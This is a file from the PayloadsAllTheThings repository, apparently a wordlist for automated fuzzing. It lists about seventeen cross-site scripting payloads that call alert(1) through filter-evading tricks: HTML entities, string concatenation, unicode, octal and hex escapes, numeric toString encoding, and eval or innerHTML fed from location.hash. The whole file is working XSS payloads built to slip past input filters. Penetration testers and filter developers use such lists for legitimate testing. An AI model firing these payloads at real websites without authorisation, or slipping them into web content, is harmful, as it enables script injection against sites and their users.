PayloadsAllTheThings/XSS Injection/Intruders/BRUTELOGIC-XSS-JS.txt
2019-03-07 00:07:55 +01:00

18 lines
378 B
Plaintext

alert`1`
alert(1)
alert(1&#x29
alert(1&#41
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
navigator.vibrate(500)
eval(URL.slice(-8))>#alert(1)
eval(location.hash.slice(1)>#alert(1)
innerHTML=location.hash>#<script>alert(1)</script>